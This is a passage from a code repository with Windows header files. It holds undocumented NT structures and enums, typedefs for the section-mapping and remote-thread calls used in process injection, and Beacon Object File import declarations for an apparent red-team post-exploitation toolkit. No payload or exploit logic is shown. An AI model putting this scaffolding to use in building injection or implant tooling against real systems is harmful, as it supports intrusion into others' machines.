RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001 658 | #define RTL_USER_PROC_PROFILE_USER 0x00000002 659 | #define RTL_USER_PROC_PROFILE_KERNEL 0x00000004 660 | #define RTL_USER_PROC_PROFILE_SERVER 0x00000008 661 | #define RTL_USER_PROC_RESERVE_1MB 0x00000020 662 | #define RTL_USER_PROC_RESERVE_16MB 0x00000040 663 | #define RTL_USER_PROC_CASE_SENSITIVE 0x00000080 664 | #define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100 665 | #define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000 666 | #define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000 667 | #define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000 668 | #define RTL_USER_PROC_OPTIN_PROCESS 0x00020000 669 | 670 | 671 | 672 | 673 | 674 | typedef enum _SYSTEM_INFORMATION_CLASS 675 | { 676 | SystemBasicInformation = 0, 677 | SystemProcessorInformation = 1, 678 | SystemPerformanceInformation = 2, 679 | SystemTimeOfDayInformation = 3, 680 | SystemPathInformation = 4, 681 | SystemProcessInformation = 5, 682 | SystemCallCountInformation = 6, 683 | SystemDeviceInformation = 7, 684 | SystemProcessorPerformanceInformation = 8, 685 | SystemFlagsInformation = 9, 686 | SystemCallTimeInformation = 10, 687 | SystemModuleInformation = 11, 688 | SystemLocksInformation = 12, 689 | SystemStackTraceInformation = 13, 690 | SystemPagedPoolInformation = 14, 691 | SystemNonPagedPoolInformation = 15, 692 | SystemHandleInformation = 16, 693 | SystemObjectInformation = 17, 694 | SystemPageFileInformation = 18, 695 | SystemVdmInstemulInformation = 19, 696 | SystemVdmBopInformation = 20, 697 | SystemFileCacheInformation = 21, 698 | SystemPoolTagInformation = 22, 699 | SystemInterruptInformation = 23, 700 | SystemDpcBehaviorInformation = 24, 701 | SystemFullMemoryInformation = 25, 702 | SystemLoadGdiDriverInformation = 26, 703 | SystemUnloadGdiDriverInformation = 27, 704 | SystemTimeAdjustmentInformation = 28, 705 | SystemSummaryMemoryInformation = 29, 706 | SystemMirrorMemoryInformation = 30, 707 | SystemPerformanceTraceInformation = 31, 708 | SystemObsolete0 = 32, 709 | SystemExceptionInformation = 33, 710 | SystemCrashDumpStateInformation = 34, 711 | SystemKernelDebuggerInformation = 35, 712 | SystemContextSwitchInformation = 36, 713 | SystemRegistryQuotaInformation = 37, 714 | SystemExtendServiceTableInformation = 38, 715 | SystemPrioritySeperation = 39, 716 | SystemVerifierAddDriverInformation = 40, 717 | SystemVerifierRemoveDriverInformation = 41, 718 | SystemProcessorIdleInformation = 42, 719 | SystemLegacyDriverInformation = 43, 720 | SystemCurrentTimeZoneInformation = 44, 721 | SystemLookasideInformation = 45, 722 | SystemTimeSlipNotification = 46, 723 | SystemSessionCreate = 47, 724 | SystemSessionDetach = 48, 725 | SystemSessionInformation = 49, 726 | SystemRangeStartInformation = 50, 727 | SystemVerifierInformation = 51, 728 | SystemVerifierThunkExtend = 52, 729 | SystemSessionProcessInformation = 53, 730 | SystemLoadGdiDriverInSystemSpace = 54, 731 | SystemNumaProcessorMap = 55, 732 | SystemPrefetcherInformation = 56, 733 | SystemExtendedProcessInformation = 57, 734 | SystemRecommendedSharedDataAlignment = 58, 735 | SystemComPlusPackage = 59, 736 | SystemNumaAvailableMemory = 60, 737 | SystemProcessorPowerInformation = 61, 738 | SystemEmulationBasicInformation = 62, 739 | SystemEmulationProcessorInformation = 63, 740 | SystemExtendedHandleInformation = 64, 741 | SystemLostDelayedWriteInformation = 65, 742 | SystemBigPoolInformation = 66, 743 | SystemSessionPoolTagInformation = 67, 744 | SystemSessionMappedViewInformation = 68, 745 | SystemHotpatchInformation = 69, 746 | SystemObjectSecurityMode = 70, 747 | SystemWatchdogTimerHandler = 71, 748 | SystemWatchdogTimerInformation = 72, 749 | SystemLogicalProcessorInformation = 73, 750 | SystemWow64SharedInformation = 74, 751 | SystemRegisterFirmwareTableInformationHandler = 75, 752 | SystemFirmwareTableInformation = 76, 753 | SystemModuleInformationEx = 77, 754 | SystemVerifierTriageInformation = 78, 755 | SystemSuperfetchInformation = 79, 756 | SystemMemoryListInformation = 80, 757 | SystemFileCacheInformationEx = 81, 758 | MaxSystemInfoClass = 82 759 | 760 | } SYSTEM_INFORMATION_CLASS; 761 | 762 | 763 | #define PS_REQUEST_BREAKAWAY 1 764 | #define PS_NO_DEBUG_INHERIT 2 765 | #define PS_INHERIT_HANDLES 4 766 | #define PS_LARGE_PAGES 8 767 | #define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | PS_NO_DEBUG_INHERIT | PS_INHERIT_HANDLES | PS_LARGE_PAGES) 768 | 769 | typedef struct _IO_STATUS_BLOCK 770 | { 771 | union 772 | { 773 | NTSTATUS Status; 774 | PVOID Pointer; 775 | }; 776 | 777 | ULONG_PTR Information; 778 | 779 | } IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; 780 | 781 | #ifndef PIO_APC_ROUTINE_DEFINED 782 | typedef 783 | VOID 784 | (NTAPI* PIO_APC_ROUTINE) ( 785 | IN PVOID ApcContext, 786 | IN PIO_STATUS_BLOCK IoStatusBlock, 787 | IN ULONG Reserved 788 | ); 789 | #define PIO_APC_ROUTINE_DEFINED 790 | #endif // PIO_APC_ROUTINE_DEFINED 791 | 792 | 793 | typedef struct _FILE_DISPOSITION_INFORMATION { 794 | BOOLEAN DeleteFile; 795 | } FILE_DISPOSITION_INFORMATION, * PFILE_DISPOSITION_INFORMATION; 796 | 797 | #ifndef FILE_SUPERSEDE 798 | #define FILE_SUPERSEDE 0x00000000 799 | #define FILE_OPEN 0x00000001 800 | #define FILE_CREATE 0x00000002 801 | #define FILE_OPEN_IF 0x00000003 802 | #define FILE_OVERWRITE 0x00000004 803 | #define FILE_OVERWRITE_IF 0x00000005 804 | #define FILE_MAXIMUM_DISPOSITION 0x00000005 805 | #endif 806 | 807 | // Define the create/open option flags 808 | #ifndef FILE_DIRECTORY_FILE 809 | #define FILE_DIRECTORY_FILE 0x00000001 810 | #define FILE_WRITE_THROUGH 0x00000002 811 | #define FILE_SEQUENTIAL_ONLY 0x00000004 812 | #define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008 813 | #define FILE_SYNCHRONOUS_IO_ALERT 0x00000010 814 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 815 | #define FILE_NON_DIRECTORY_FILE 0x00000040 816 | #define FILE_CREATE_TREE_CONNECTION 0x00000080 817 | #define FILE_COMPLETE_IF_OPLOCKED 0x00000100 818 | #define FILE_NO_EA_KNOWLEDGE 0x00000200 819 | #define FILE_OPEN_FOR_RECOVERY 0x00000400 820 | #define FILE_RANDOM_ACCESS 0x00000800 821 | #define FILE_DELETE_ON_CLOSE 0x00001000 822 | #define FILE_OPEN_BY_FILE_ID 0x00002000 823 | #define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000 824 | #define FILE_NO_COMPRESSION 0x00008000 825 | #define FILE_RESERVE_OPFILTER 0x00100000 826 | #define FILE_OPEN_REPARSE_POINT 0x00200000 827 | #define FILE_OPEN_NO_RECALL 0x00400000 828 | #define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000 829 | #endif // FILE_DIRECTORY_FILE 830 | 831 | typedef LONG KPRIORITY; 832 | 833 | typedef struct _PROCESS_BASIC_INFORMATION 834 | { 835 | NTSTATUS ExitStatus; 836 | PPEB PebBaseAddress; 837 | ULONG_PTR AffinityMask; 838 | KPRIORITY BasePriority; 839 | ULONG_PTR UniqueProcessId; 840 | ULONG_PTR InheritedFromUniqueProcessId; 841 | 842 | } PROCESS_BASIC_INFORMATION, * PPROCESS_BASIC_INFORMATION; 843 | 844 | 845 | typedef enum _FILE_INFORMATION_CLASS 846 | { 847 | FileDirectoryInformation = 1, 848 | FileFullDirectoryInformation, // 2 849 | FileBothDirectoryInformation, // 3 850 | FileBasicInformation, // 4 wdm 851 | FileStandardInformation, // 5 wdm 852 | FileInternalInformation, // 6 853 | FileEaInformation, // 7 854 | FileAccessInformation, // 8 855 | FileNameInformation, // 9 856 | FileRenameInformation, // 10 857 | FileLinkInformation, // 11 858 | FileNamesInformation, // 12 859 | FileDispositionInformation, // 13 860 | FilePositionInformation, // 14 wdm 861 | FileFullEaInformation, // 15 862 | FileModeInformation, // 16 863 | FileAlignmentInformation, // 17 864 | FileAllInformation, // 18 865 | FileAllocationInformation, // 19 866 | FileEndOfFileInformation, // 20 wdm 867 | FileAlternateNameInformation, // 21 868 | FileStreamInformation, // 22 869 | FilePipeInformation, // 23 870 | FilePipeLocalInformation, // 24 871 | FilePipeRemoteInformation, // 25 872 | FileMailslotQueryInformation, // 26 873 | FileMailslotSetInformation, // 27 874 | FileCompressionInformation, // 28 875 | FileObjectIdInformation, // 29 876 | FileCompletionInformation, // 30 877 | FileMoveClusterInformation, // 31 878 | FileQuotaInformation, // 32 879 | FileReparsePointInformation, // 33 880 | FileNetworkOpenInformation, // 34 881 | FileAttributeTagInformation, // 35 882 | FileTrackingInformation, // 36 883 | FileIdBothDirectoryInformation, // 37 884 | FileIdFullDirectoryInformation, // 38 885 | FileValidDataLengthInformation, // 39 886 | FileShortNameInformation, // 40 887 | FileIoCompletionNotificationInformation, // 41 888 | FileIoStatusBlockRangeInformation, // 42 889 | FileIoPriorityHintInformation, // 43 890 | FileSfioReserveInformation, // 44 891 | FileSfioVolumeInformation, // 45 892 | FileHardLinkInformation, // 46 893 | FileProcessIdsUsingFileInformation, // 47 894 | FileMaximumInformation // 48 895 | } FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS; 896 | 897 | typedef enum _PROCESSINFOCLASS { 898 | ProcessBasicInformation, 899 | ProcessQuotaLimits, 900 | ProcessIoCounters, 901 | ProcessVmCounters, 902 | ProcessTimes, 903 | ProcessBasePriority, 904 | ProcessRaisePriority, 905 | ProcessDebugPort, 906 | ProcessExceptionPort, 907 | ProcessAccessToken, 908 | ProcessLdtInformation, 909 | ProcessLdtSize, 910 | ProcessDefaultHardErrorMode, 911 | ProcessIoPortHandlers, // Note: this is kernel mode only 912 | ProcessPooledUsageAndLimits, 913 | ProcessWorkingSetWatch, 914 | ProcessUserModeIOPL, 915 | ProcessEnableAlignmentFaultFixup, 916 | ProcessPriorityClass, 917 | ProcessWx86Information, 918 | ProcessHandleCount, 919 | ProcessAffinityMask, 920 | ProcessPriorityBoost, 921 | ProcessDeviceMap, 922 | ProcessSessionInformation, 923 | ProcessForegroundInformation, 924 | ProcessWow64Information, 925 | ProcessImageFileName, 926 | ProcessLUIDDeviceMapsEnabled, 927 | ProcessBreakOnTermination, 928 | ProcessDebugObjectHandle, 929 | ProcessDebugFlags, 930 | ProcessHandleTracing, 931 | MaxProcessInfoClass // MaxProcessInfoClass should always be the last enum 932 | } PROCESSINFOCLASS; 933 | 934 | 935 | 936 | //*********************************************************************************************************************************************************************************************** 937 | //********************************************* ***************************************************************** 938 | //********************************************* ***************************************************************** 939 | //*********************************************************************************************************************************************************************************************** 940 | 941 | typedef NTSTATUS(NTAPI* fnNtCreateSection)( 942 | OUT PHANDLE SectionHandle, 943 | IN ACCESS_MASK DesiredAccess, 944 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 945 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 946 | IN ULONG SectionPageProtection, 947 | IN ULONG AllocationAttributes, 948 | IN HANDLE FileHandle OPTIONAL 949 | ); 950 | 951 | typedef NTSTATUS(NTAPI* fnNtMapViewOfSection)( 952 | IN HANDLE SectionHandle, 953 | IN HANDLE ProcessHandle, 954 | IN OUT PVOID* BaseAddress, 955 | IN SIZE_T ZeroBits, 956 | IN SIZE_T CommitSize, 957 | IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, 958 | IN OUT PSIZE_T ViewSize, 959 | IN SECTION_INHERIT InheritDisposition, 960 | IN ULONG AllocationType, 961 | IN ULONG Protect 962 | ); 963 | 964 | 965 | typedef NTSTATUS(NTAPI* fnNtCreateThreadEx)( 966 | PHANDLE ThreadHandle, 967 | ACCESS_MASK DesiredAccess, 968 | POBJECT_ATTRIBUTES ObjectAttributes, 969 | HANDLE ProcessHandle, 970 | PVOID StartRoutine, 971 | PVOID Argument, 972 | ULONG CreateFlags, 973 | SIZE_T ZeroBits, 974 | SIZE_T StackSize, 975 | SIZE_T MaximumStackSize, 976 | PPS_ATTRIBUTE_LIST AttributeList 977 | ); 978 | 979 | #endif // !STRUCTS_H -------------------------------------------------------------------------------- /include/bofdefs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #pragma intrinsic(memcmp, memcpy,strcpy,strcmp,_stricmp,strlen) 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | //KERNEL32 18 | // #define BOF 19 | #ifdef BOF 20 | WINBASEAPI void * WINAPI KERNEL32$VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 21 | WINBASEAPI int WINAPI KERNEL32$VirtualFree (LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); 22 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc (UINT, SIZE_T); 23 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree (HLOCAL); 24 | WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 25 | WINBASEAPI LPVOID WINAPI KERNEL32$HeapReAlloc (HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); 26 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 27 | WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID); 28 | WINBASEAPI DWORD WINAPI KERNEL32$FormatMessageA (DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPSTR lpBuffer, DWORD nSize, va_list *Arguments); 29 | WINBASEAPI int WINAPI Kernel32$WideCharToMultiByte (UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar); 30 | WINBASEAPI int WINAPI KERNEL32$FileTimeToLocalFileTime (CONST FILETIME *lpFileTime, LPFILETIME lpLocalFileTime); 31 | WINBASEAPI int WINAPI KERNEL32$FileTimeToSystemTime (CONST FILETIME *lpFileTime, LPSYSTEMTIME lpSystemTime); 32 | WINBASEAPI int WINAPI KERNEL32$GetDateFormatW (LCID Locale, DWORD dwFlags, CONST SYSTEMTIME *lpDate, LPCWSTR lpFormat, LPWSTR lpDateStr, int cchDate); 33 | WINBASEAPI VOID WINAPI KERNEL32$GetSystemTimeAsFileTime (LPFILETIME lpSystemTimeAsFileTime); 34 | WINBASEAPI VOID WINAPI KERNEL32$GetLocalTime (LPSYSTEMTIME lpSystemTime); 35 | WINBASEAPI WINBOOL WINAPI KERNEL32$SystemTimeToFileTime (CONST SYSTEMTIME *lpSystemTime, LPFILETIME lpFileTime); 36 | WINBASEAPI WINBOOL WINAPI KERNEL32$SystemTimeToTzSpecificLocalTime (CONST TIME_ZONE_INFORMATION *lpTimeZoneInformation, CONST SYSTEMTIME *lpUniversalTime, LPSYSTEMTIME lpLocalTime); 37 | WINBASEAPI WINBOOL WINAPI KERNEL32$GlobalMemoryStatusEx (LPMEMORYSTATUSEX lpBuffer); 38 | WINBASEAPI WINBOOL WINAPI KERNEL32$GetDiskFreeSpaceExA (LPCSTR lpDirectoryName, PULARGE_INTEGER lpFreeBytesAvailableToCaller, PULARGE_INTEGER lpTotalNumberOfBytes, PULARGE_INTEGER lpTotalNumberOfFreeBytes); 39 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID); 40 | DECLSPEC_IMPORT DWORD KERNEL32$GetCurrentProcessId(VOID); 41 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID); 42 | WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject); 43 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateThread (LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); 44 | WINBASEAPI DWORD WINAPI KERNEL32$GetTickCount (VOID); 45 | WINBASEAPI ULONGLONG WINAPI KERNEL32$GetTickCount64 (VOID); 46 | WINBASEAPI LPVOID WINAPI KERNEL32$CreateFiber (SIZE_T dwStackSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter); 47 | WINBASEAPI LPVOID WINAPI KERNEL32$ConvertThreadToFiber (LPVOID lpParameter); 48 | WINBASEAPI WINBOOL WINAPI KERNEL32$ConvertFiberToThread (VOID); 49 | WINBASEAPI VOID WINAPI KERNEL32$DeleteFiber (LPVOID lpFiber); 50 | WINBASEAPI VOID WINAPI KERNEL32$SwitchToFiber (LPVOID lpFiber); 51 | WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 52 | WINBASEAPI VOID WINAPI KERNEL32$Sleep (DWORD dwMilliseconds); 53 | WINBASEAPI WINBOOL WINAPI KERNEL32$DeleteFileW (LPCWSTR lpFileName); 54 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 55 | WINBASEAPI DWORD WINAPI KERNEL32$GetFileSize (HANDLE hFile, LPDWORD lpFileSizeHigh); 56 | WINBASEAPI WINBOOL WINAPI KERNEL32$ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); 57 | WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId); 58 | WINBASEAPI WINBOOL WINAPI KERNEL32$GetComputerNameExW (COMPUTER_NAME_FORMAT NameType, LPWSTR lpBuffer, LPDWORD nSize); 59 | WINBASEAPI int WINAPI KERNEL32$lstrlenW (LPCWSTR lpString); 60 | WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcatW (LPWSTR lpString1, LPCWSTR lpString2); 61 | WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcpynW (LPWSTR lpString1, LPCWSTR lpString2, int iMaxLength); 62 | WINBASEAPI DWORD WINAPI KERNEL32$GetFullPathNameW (LPCWSTR lpFileName, DWORD nBufferLength, LPWSTR lpBuffer, LPWSTR *lpFilePart); 63 | WINBASEAPI DWORD WINAPI KERNEL32$GetFileAttributesW (LPCWSTR lpFileName); 64 | WINBASEAPI DWORD WINAPI KERNEL32$GetCurrentDirectoryW (DWORD nBufferLength, LPWSTR lpBuffer); 65 | WINBASEAPI HANDLE WINAPI KERNEL32$FindFirstFileW (LPCWSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData); 66 | WINBASEAPI HANDLE WINAPI KERNEL32$FindFirstFileA (char * lpFileName, LPWIN32_FIND_DATA lpFindFileData); 67 | WINBASEAPI WINBOOL WINAPI KERNEL32$FindNextFileW (HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData); 68 | WINBASEAPI WINBOOL WINAPI KERNEL32$FindNextFileA (HANDLE hFindFile, LPWIN32_FIND_DATA lpFindFileData); 69 | WINBASEAPI WINBOOL WINAPI KERNEL32$FindClose (HANDLE hFindFile); 70 | WINBASEAPI VOID WINAPI KERNEL32$SetLastError (DWORD dwErrCode); 71 | #define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 72 | #define intRealloc(ptr, size) (ptr) ? KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, ptr, size) : KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 73 | #define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr) 74 | #define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size) 75 | DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalAlloc(UINT uFlags, SIZE_T dwBytes); 76 | DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalFree(HGLOBAL hMem); 77 | DECLSPEC_IMPORT LPTCH WINAPI KERNEL32$GetEnvironmentStrings(); 78 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$FreeEnvironmentStringsA(LPSTR); 79 | WINBASEAPI DWORD WINAPI KERNEL32$ExpandEnvironmentStringsW (LPCWSTR lpSrc, LPWSTR lpDst, DWORD nSize); 80 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID); 81 | WINBASEAPI WINBOOL WINAPI KERNEL32$Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe); 82 | WINBASEAPI WINBOOL WINAPI KERNEL32$Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe); 83 | WINBASEAPI WINBOOL WINAPI KERNEL32$Module32First(HANDLE hSnapshot,LPMODULEENTRY32 lpme); 84 | WINBASEAPI WINBOOL WINAPI KERNEL32$Module32Next(HANDLE hSnapshot,LPMODULEENTRY32 lpme); 85 | WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA (LPCSTR lpLibFileName); 86 | WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress (HMODULE hModule, LPCSTR lpProcName); 87 | WINBASEAPI WINBOOL WINAPI KERNEL32$FreeLibrary (HMODULE hLibModule); 88 | DECLSPEC_IMPORT WINBASEAPI int WINAPI KERNEL32$lstrlenA(LPCSTR); 89 | DECLSPEC_IMPORT int WINAPI KERNEL32$GetLocaleInfoEx(LPCWSTR lpLocaleName, LCTYPE LCType, LPWSTR lpLCData, int cchData); 90 | WINBASEAPI int WINAPI KERNEL32$GetSystemDefaultLocaleName(LPCWSTR lpLocaleName, int cchLocaleName); 91 | DECLSPEC_IMPORT LCID WINAPI KERNEL32$LocaleNameToLCID(LPCWSTR lpName, DWORD dwFlags); 92 | DECLSPEC_IMPORT int WINAPI KERNEL32$GetDateFormatEx(LPCWSTR lpLocaleName, DWORD dwFlags, const SYSTEMTIME *lpData, LPCWSTR lpFormat, LPWSTR lpDateStr, int cchDate, LPCWSTR lpCalendar); 93 | 94 | 95 | //WTSAPI32 96 | DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSEnumerateSessionsA(LPVOID, DWORD, DWORD, PWTS_SESSION_INFO*, DWORD*); 97 | DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSQuerySessionInformationA(LPVOID, DWORD, WTS_INFO_CLASS , LPSTR*, DWORD*); 98 | DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSFreeMemory(PVOID); 99 | 100 | //Iphlpapi.lib 101 | //ULONG WINAPI IPHLPAPI$GetAdaptersInfo (PIP_ADAPTER_INFO AdapterInfo, PULONG SizePointer); 102 | DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetAdaptersInfo(PIP_ADAPTER_INFO,PULONG); 103 | DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetIpForwardTable (PMIB_IPFORWARDTABLE pIpForwardTable, PULONG pdwSize, WINBOOL bOrder); 104 | DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetNetworkParams(PFIXED_INFO,PULONG); 105 | DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetUdpTable (PMIB_UDPTABLE UdpTable, PULONG SizePointer, WINBOOL Order); 106 | DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetTcpTable (PMIB_TCPTABLE TcpTable, PULONG SizePointer, WINBOOL Order); 107 | DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetIpNetTable(PMIB_IPNETTABLE IpNetTable,PULONG SizePointer, BOOL Order); 108 | 109 | //MSVCRT 110 | WINBASEAPI char *__cdecl MSVCRT$_ultoa(unsigned long _Value,char *_Dest,int _Radix); 111 | WINBASEAPI void *__cdecl MSVCRT$calloc(size_t _NumOfElements, size_t _SizeOfElements); 112 | WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount); 113 | WINBASEAPI int __cdecl MSVCRT$memcmp(const void *_Buf1,const void *_Buf2,size_t _Size); 114 | WINBASEAPI void *__cdecl MSVCRT$realloc(void *_Memory, size_t _NewSize); 115 | WINBASEAPI void __cdecl MSVCRT$free(void *_Memory); 116 | WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); 117 | WINBASEAPI int __cdecl MSVCRT$sprintf(char *__stream, const char *__format, ...); 118 | WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg); 119 | WINBASEAPI int __cdecl MSVCRT$_snwprintf(wchar_t * __restrict__ _Dest,size_t _Count,const wchar_t * __restrict__ _Format,...); 120 | WINBASEAPI errno_t __cdecl MSVCRT$wcscpy_s(wchar_t *_Dst, rsize_t _DstSize, const wchar_t *_Src); 121 | WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str); 122 | WINBASEAPI size_t __cdecl MSVCRT$wcstombs(char * __restrict__ _Dest,const wchar_t * __restrict__ _Source,size_t _MaxCount); 123 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcscmp(const wchar_t *_lhs,const wchar_t *_rhs); 124 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcstok(wchar_t * __restrict__ _Str,const wchar_t * __restrict__ _Delim); 125 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcstok_s(wchar_t *_Str,const wchar_t *_Delim,wchar_t **_Context); 126 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcsstr(const wchar_t *_Str,const wchar_t *_SubStr); 127 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcscat(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Source); 128 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcsncat(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source, size_t _Count); 129 | WINBASEAPI wchar_t *__cdecl MSVCRT$strncat(char * __restrict__ _Dest,const char * __restrict__ _Source, size_t _Count); 130 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcscpy(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source); 131 | WINBASEAPI int __cdecl MSVCRT$_wcsicmp(const wchar_t *_Str1,const wchar_t *_Str2); 132 | WINBASEAPI int __cdecl MSVCRT$_wcsnicmp(const wchar_t *_Str1,const wchar_t *_Str2, size_t _Count); 133 | WINBASEAPI int __cdecl MSVCRT$_strnicmp(const char *_Str1,const char *_Str2, size_t _Count); 134 | WINBASEAPI _CONST_RETURN wchar_t *__cdecl MSVCRT$wcschr(const wchar_t *_Str, wchar_t _Ch); 135 | 136 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcsrchr(const wchar_t *_Str,wchar_t _Ch); 137 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcsrchr(const wchar_t *_Str,wchar_t _Ch); 138 | WINBASEAPI unsigned long __cdecl MSVCRT$wcstoul(const wchar_t * __restrict__ _Str,wchar_t ** __restrict__ _EndPtr,int _Radix); 139 | DECLSPEC_IMPORT char * __cdecl MSVCRT$strcat(char * __restrict__ _Dest,const char * __restrict__ _Source); 140 | WINBASEAPI size_t __cdecl MSVCRT$strnlen(const char *_Str,size_t _MaxCount); 141 | WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str); 142 | DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2); 143 | DECLSPEC_IMPORT int __cdecl MSVCRT$_stricmp(const char *string1,const char *string2); 144 | WINBASEAPI int __cdecl MSVCRT$strncmp(const char *_Str1,const char *_Str2,size_t _MaxCount); 145 | DECLSPEC_IMPORT char * __cdecl MSVCRT$strcpy(char * __restrict__ __dst, const char * __restrict__ __src); 146 | DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strstr(const char *haystack, const char *needle); 147 | DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strchr(const char *haystack, int needle); 148 | DECLSPEC_IMPORT char *__cdecl MSVCRT$strtok(char * __restrict__ _Str,const char * __restrict__ _Delim); 149 | _CRTIMP char *__cdecl MSVCRT$strtok_s(char *_Str,const char *_Delim,char **_Context); 150 | WINBASEAPI unsigned long __cdecl MSVCRT$strtoul(const char * __restrict__ _Str,char ** __restrict__ _EndPtr,int _Radix); 151 | WINBASEAPI size_t __cdecl MSVCRT$strftime(char *_DstBuf,size_t _SizeInBytes,const char *_Format,const struct tm *_Tm); 152 | WINBASEAPI struct tm * __cdecl MSVCRT$gmtime(const time_t *_Time); 153 | WINBASEAPI wchar_t * __cdecl MSVCRT$wcsncat(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Source,size_t _Count); 154 | 155 | //DNSAPI 156 | DECLSPEC_IMPORT DNS_STATUS WINAPI DNSAPI$DnsQuery_A(PCSTR,WORD,DWORD,PIP4_ARRAY,PDNS_RECORD*,PVOID*); 157 | DECLSPEC_IMPORT VOID WINAPI DNSAPI$DnsFree(PVOID pData,DNS_FREE_TYPE FreeType); 158 | 159 | //WSOCK32 160 | 